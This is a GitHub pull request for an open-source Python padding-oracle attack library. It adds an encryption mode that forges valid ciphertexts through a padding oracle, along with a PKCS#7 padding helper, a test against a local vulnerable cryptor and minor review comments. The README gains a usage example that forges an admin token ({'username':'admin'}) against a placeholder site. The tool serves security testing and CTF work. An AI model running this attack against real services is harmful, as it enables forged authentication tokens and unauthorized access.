Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add encryption support #4

Merged
merged 7 commits into from
Nov 17, 2023
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
36 changes: 35 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,9 @@ Performance of padding_oracle.py was evaluated using [0x09] Cathub Party from ED
| 16 | 1m 20s |
| 64 | 56s |

## How to Use
## How to Use

### Decryption
q3st1on marked this conversation as resolved.
Show resolved Hide resolved

To illustrate the usage, consider an example of testing `https://vulnerable.website/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D`:

Expand Down Expand Up @@ -64,6 +66,38 @@ plaintext = padding_oracle(
)
```

### Encryption
Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Nit: Needs an extra line above and below.


To illustrate the usage, consider an example of forging a token for `https://vulnerable.website/api/?token=<.....>` :

```python
from padding_oracle import padding_oracle, base64_encode, base64_decode
import requests

sess = requests.Session() # use connection pool
url = 'https://vulnerable.website/api/'

def oracle(ciphertext: bytes):
resp = sess.get(url, params={'token': base64_encode(ciphertext)})

if 'failed' in resp.text:
return False # e.g. token decryption failed
elif 'success' in resp.text:
return True
else:
raise RuntimeError('unexpected behavior')

payload: bytes =b"{'username':'admin'}"

ciphertext = padding_oracle(
payload,
block_size = 16,
oracle = oracle,
num_threads = 16,
mode = 'encrypt'
)
```

In addition, the package provides PHP-like encoding/decoding functions:

```python
Expand Down
95 changes: 84 additions & 11 deletions src/padding_oracle/legacy.py
Original file line number Diff line number Diff line change
Expand Up @@ -27,27 +27,29 @@
from .encoding import to_bytes
from .solve import (
solve, Fail, OracleFunc, ResultType,
convert_to_bytes, remove_padding)
convert_to_bytes, remove_padding, add_padding)

__all__ = [
'padding_oracle',
]


q3st1on marked this conversation as resolved.
Show resolved Hide resolved
def padding_oracle(ciphertext: Union[bytes, str],
def padding_oracle(payload: Union[bytes, str],
block_size: int,
oracle: OracleFunc,
num_threads: int = 1,
log_level: int = logging.INFO,
null_byte: bytes = b' ',
return_raw: bool = False,
mode: Union[bool, str] = 'decrypt',
pad_payload: bool = True
) -> Union[bytes, List[int]]:
'''
Run padding oracle attack to decrypt ciphertext given a function to check
wether the ciphertext can be decrypted successfully.

Args:
ciphertext (bytes|str) the ciphertext you want to decrypt
payload (bytes|str) the payload you want to encrypt/decrypt
block_size (int) block size (the ciphertext length should be
multiple of this)
oracle (function) a function: oracle(ciphertext: bytes) -> bool
Expand All @@ -58,33 +60,49 @@ def padding_oracle(ciphertext: Union[bytes, str],
set (default: None)
return_raw (bool) do not convert plaintext into bytes and
unpad (default: False)
mode (str) encrypt the payload (defaut: 'decrypt')
pad_payload (bool) PKCS#7 pad the supplied payload before
encryption (default: True)


Returns:
plaintext (bytes|List[int]) the decrypted plaintext
result (bytes|List[int]) the processed payload
'''

# Check args
if not callable(oracle):
raise TypeError('the oracle function should be callable')
if not isinstance(ciphertext, (bytes, str)):
raise TypeError('ciphertext should have type bytes')
if not isinstance(payload, (bytes, str)):
raise TypeError('payload should have type bytes')
if not isinstance(block_size, int):
raise TypeError('block_size should have type int')
if not len(ciphertext) % block_size == 0:
raise ValueError('ciphertext length should be multiple of block size')
if not 1 <= num_threads <= 1000:
raise ValueError('num_threads should be in [1, 1000]')
if not isinstance(null_byte, (bytes, str)):
raise TypeError('expect null with type bytes or str')
if not len(null_byte) == 1:
raise ValueError('null byte should have length of 1')

if not isinstance(mode, str):
raise TypeError('expect mode with type str')
if isinstance(mode, str) and mode not in ('encrypt', 'decrypt'):
raise ValueError('mode must be either encrypt or decrypt')
if (mode == 'decrypt') and not (len(payload) % block_size == 0):
raise ValueError('for decryption payload length should be multiple of block size')
logger = get_logger()
logger.setLevel(log_level)

ciphertext = to_bytes(ciphertext)
payload = to_bytes(payload)
null_byte = to_bytes(null_byte)

# Does the user want the encryption routine
if (mode == 'encrypt'):
return encrypt(payload, block_size, oracle, num_threads, null_byte, pad_payload, logger)

# If not continue with decryption as normal
return decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger)


def decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger):
# Wrapper to handle exceptions from the oracle function
def wrapped_oracle(ciphertext: bytes):
try:
Expand All @@ -105,7 +123,7 @@ def plaintext_callback(plaintext: bytes):
plaintext = convert_to_bytes(plaintext, null_byte)
logger.info(f'plaintext: {plaintext}')

plaintext = solve(ciphertext, block_size, wrapped_oracle, num_threads,
plaintext = solve(payload, block_size, wrapped_oracle, num_threads,
result_callback, plaintext_callback)

if not return_raw:
Expand All @@ -115,6 +133,61 @@ def plaintext_callback(plaintext: bytes):
return plaintext


def encrypt(payload, block_size, oracle, num_threads, null_byte, pad_payload, logger):
# Wrapper to handle exceptions from the oracle function
def wrapped_oracle(ciphertext: bytes):
try:
return oracle(ciphertext)
except Exception as e:
logger.error(f'error in oracle with {ciphertext!r}, {e}')
logger.debug('error details: {}'.format(traceback.format_exc()))
return False

def result_callback(result: ResultType):
if isinstance(result, Fail):
if result.is_critical:
logger.critical(result.message)
else:
logger.error(result.message)

def plaintext_callback(plaintext: bytes):
q3st1on marked this conversation as resolved.
Show resolved Hide resolved
plaintext = convert_to_bytes(plaintext, null_byte).strip(null_byte)
bytes_done = str(len(plaintext)).rjust(len(str(block_size)), ' ')
blocks_done = solve_index.rjust(len(block_total), ' ')
printout = "{0}/{1} bytes encrypted in block {2}/{3}".format(bytes_done, block_size, blocks_done, block_total)
logger.info(printout)

def blocks(data: bytes):
return [data[index:(index+block_size)] for index in range(0, len(data), block_size)]

def bytes_xor(byte_string_1: bytes, byte_string_2: bytes):
return bytes([_a ^ _b for _a, _b in zip(byte_string_1, byte_string_2)])

if pad_payload:
payload = add_padding(payload, block_size)

if len(payload) % block_size != 0:
raise ValueError('''For encryption payload length must be a multiple of blocksize. Perhaps you meant to
pad the payload (inbuilt PKCS#7 padding can be enabled by setting pad_payload=True)''')

plaintext_blocks = blocks(payload)
ciphertext_blocks = [null_byte * block_size for _ in range(len(plaintext_blocks)+1)]

solve_index = '1'
block_total = str(len(plaintext_blocks))

for index in range(len(plaintext_blocks)-1, -1, -1):
plaintext = solve(b'\x00' * block_size + ciphertext_blocks[index+1], block_size, wrapped_oracle,
num_threads, result_callback, plaintext_callback)
ciphertext_blocks[index] = bytes_xor(plaintext_blocks[index], plaintext)
solve_index = str(int(solve_index)+1)

ciphertext = b''.join(ciphertext_blocks)
logger.info(f"forged ciphertext: {ciphertext}")

return ciphertext


def get_logger():
logger = logging.getLogger('padding_oracle')
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s')
Expand Down
10 changes: 10 additions & 0 deletions src/padding_oracle/solve.py
Original file line number Diff line number Diff line change
Expand Up @@ -36,6 +36,7 @@
'solve',
'convert_to_bytes',
'remove_padding',
'add_padding'
]


Expand Down Expand Up @@ -265,3 +266,12 @@ def remove_padding(data: Union[str, bytes, List[int]]) -> bytes:
'''
data = to_bytes(data)
return data[:-data[-1]]


def add_padding(data: Union[str, bytes, List[int]], block_size: int) -> bytes:
'''
Add PKCS#7 padding bytes.
'''
data = to_bytes(data)
pad_len = block_size - len(data) % block_size
return data + (bytes([pad_len]) * pad_len)
13 changes: 13 additions & 0 deletions tests/test_padding_oracle.py
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@
from cryptography.hazmat.primitives import padding
from padding_oracle import padding_oracle
from .cryptor import VulnerableCryptor

Expand All @@ -14,6 +15,18 @@ def test_padding_oracle_basic():

assert decrypted == plaintext

def test_padding_oracle_encryption():
cryptor = VulnerableCryptor()

plaintext = b'the quick brown fox jumps over the lazy dog'
ciphertext = cryptor.encrypt(plaintext)

encrypted = padding_oracle(plaintext, cryptor.block_size,
cryptor.oracle, 4, null_byte=b'?', mode='encrypt')
decrypted = cryptor.decrypt(encrypted)

assert decrypted == plaintext
Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It will be better to write assert encrypted == ciphertext here 🤔


if __name__ == '__main__':
test_padding_oracle_basic()
test_padding_oracle_encryption()